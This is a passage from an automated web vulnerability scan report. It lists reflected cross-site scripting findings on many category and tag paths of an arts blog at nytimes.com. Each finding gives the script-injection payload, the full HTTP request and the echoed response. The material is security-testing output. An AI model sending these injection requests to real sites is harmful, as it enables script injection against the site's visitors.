The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9f6"><script>alert(1)</script>58f86990e4f was submitted in the REST URL parameter 2. This input was echoed as 1e9f6\"><script>alert(1)</script>58f86990e4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/art-design1e9f6"><script>alert(1)</script>58f86990e4f/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/art-design1e9f6\"><script>alert(1)</script>58f86990e4f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.39. http://artsbeat.blogs.nytimes.com/category/arts-general/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/arts-general/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70f0"><script>alert(1)</script>c5a9dd137e4 was submitted in the REST URL parameter 2. This input was echoed as f70f0\"><script>alert(1)</script>c5a9dd137e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/arts-generalf70f0"><script>alert(1)</script>c5a9dd137e4/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/arts-generalf70f0\"><script>alert(1)</script>c5a9dd137e4&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.40. http://artsbeat.blogs.nytimes.com/category/books/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/books/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2af69"><script>alert(1)</script>bb647269876 was submitted in the REST URL parameter 2. This input was echoed as 2af69\"><script>alert(1)</script>bb647269876 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/books2af69"><script>alert(1)</script>bb647269876/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/books2af69\"><script>alert(1)</script>bb647269876&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.41. http://artsbeat.blogs.nytimes.com/category/classical-music/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/classical-music/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddd77"><script>alert(1)</script>6d4e36739ac was submitted in the REST URL parameter 2. This input was echoed as ddd77\"><script>alert(1)</script>6d4e36739ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/classical-musicddd77"><script>alert(1)</script>6d4e36739ac/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/classical-musicddd77\"><script>alert(1)</script>6d4e36739ac&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.42. http://artsbeat.blogs.nytimes.com/category/dance/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/dance/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0f7"><script>alert(1)</script>7745ad10317 was submitted in the REST URL parameter 2. This input was echoed as ad0f7\"><script>alert(1)</script>7745ad10317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/dancead0f7"><script>alert(1)</script>7745ad10317/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/dancead0f7\"><script>alert(1)</script>7745ad10317&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.43. http://artsbeat.blogs.nytimes.com/category/featured/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/featured/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4f4"><script>alert(1)</script>618049fbd12 was submitted in the REST URL parameter 2. This input was echoed as 8e4f4\"><script>alert(1)</script>618049fbd12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/featured8e4f4"><script>alert(1)</script>618049fbd12/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/featured8e4f4\"><script>alert(1)</script>618049fbd12&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.44. http://artsbeat.blogs.nytimes.com/category/movies/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/movies/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d062"><script>alert(1)</script>621d42481fe was submitted in the REST URL parameter 2. This input was echoed as 8d062\"><script>alert(1)</script>621d42481fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/movies8d062"><script>alert(1)</script>621d42481fe/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:06 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/movies8d062\"><script>alert(1)</script>621d42481fe&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.45. http://artsbeat.blogs.nytimes.com/category/music/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/music/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0781"><script>alert(1)</script>63dd7b81cef was submitted in the REST URL parameter 2. This input was echoed as f0781\"><script>alert(1)</script>63dd7b81cef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/musicf0781"><script>alert(1)</script>63dd7b81cef/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/musicf0781\"><script>alert(1)</script>63dd7b81cef&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.46. http://artsbeat.blogs.nytimes.com/category/new-york-city/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/new-york-city/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78201"><script>alert(1)</script>9bba86db8b1 was submitted in the REST URL parameter 2. This input was echoed as 78201\"><script>alert(1)</script>9bba86db8b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/new-york-city78201"><script>alert(1)</script>9bba86db8b1/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/new-york-city78201\"><script>alert(1)</script>9bba86db8b1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.47. http://artsbeat.blogs.nytimes.com/category/television/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/television/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca6e"><script>alert(1)</script>e1cf7713b07 was submitted in the REST URL parameter 2. This input was echoed as 6ca6e\"><script>alert(1)</script>e1cf7713b07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/television6ca6e"><script>alert(1)</script>e1cf7713b07/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/television6ca6e\"><script>alert(1)</script>e1cf7713b07&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.48. http://artsbeat.blogs.nytimes.com/category/theater/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/category/theater/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8370"><script>alert(1)</script>08e1b6da719 was submitted in the REST URL parameter 2. This input was echoed as f8370\"><script>alert(1)</script>08e1b6da719 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/theaterf8370"><script>alert(1)</script>08e1b6da719/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/theaterf8370\"><script>alert(1)</script>08e1b6da719&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.49. http://artsbeat.blogs.nytimes.com/tag/amc/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/amc/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43f1c"><script>alert(1)</script>41d4afcb6d4 was submitted in the REST URL parameter 2. This input was echoed as 43f1c\"><script>alert(1)</script>41d4afcb6d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/amc43f1c"><script>alert(1)</script>41d4afcb6d4/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/amc43f1c\"><script>alert(1)</script>41d4afcb6d4&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.50. http://artsbeat.blogs.nytimes.com/tag/anatomy-of-a-scene/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/anatomy-of-a-scene/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7e99"><script>alert(1)</script>6201528606d was submitted in the REST URL parameter 2. This input was echoed as e7e99\"><script>alert(1)</script>6201528606d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/anatomy-of-a-scenee7e99"><script>alert(1)</script>6201528606d/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/anatomy-of-a-scenee7e99\"><script>alert(1)</script>6201528606d&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.51. http://artsbeat.blogs.nytimes.com/tag/chris-pine/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/chris-pine/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef3a"><script>alert(1)</script>8b298f2fb19 was submitted in the REST URL parameter 2. This input was echoed as 4ef3a\"><script>alert(1)</script>8b298f2fb19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/chris-pine4ef3a"><script>alert(1)</script>8b298f2fb19/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/chris-pine4ef3a\"><script>alert(1)</script>8b298f2fb19&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.52. http://artsbeat.blogs.nytimes.com/tag/denzel-washington/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/denzel-washington/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bb6"><script>alert(1)</script>38050bcc525 was submitted in the REST URL parameter 2. This input was echoed as 69bb6\"><script>alert(1)</script>38050bcc525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/denzel-washington69bb6"><script>alert(1)</script>38050bcc525/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
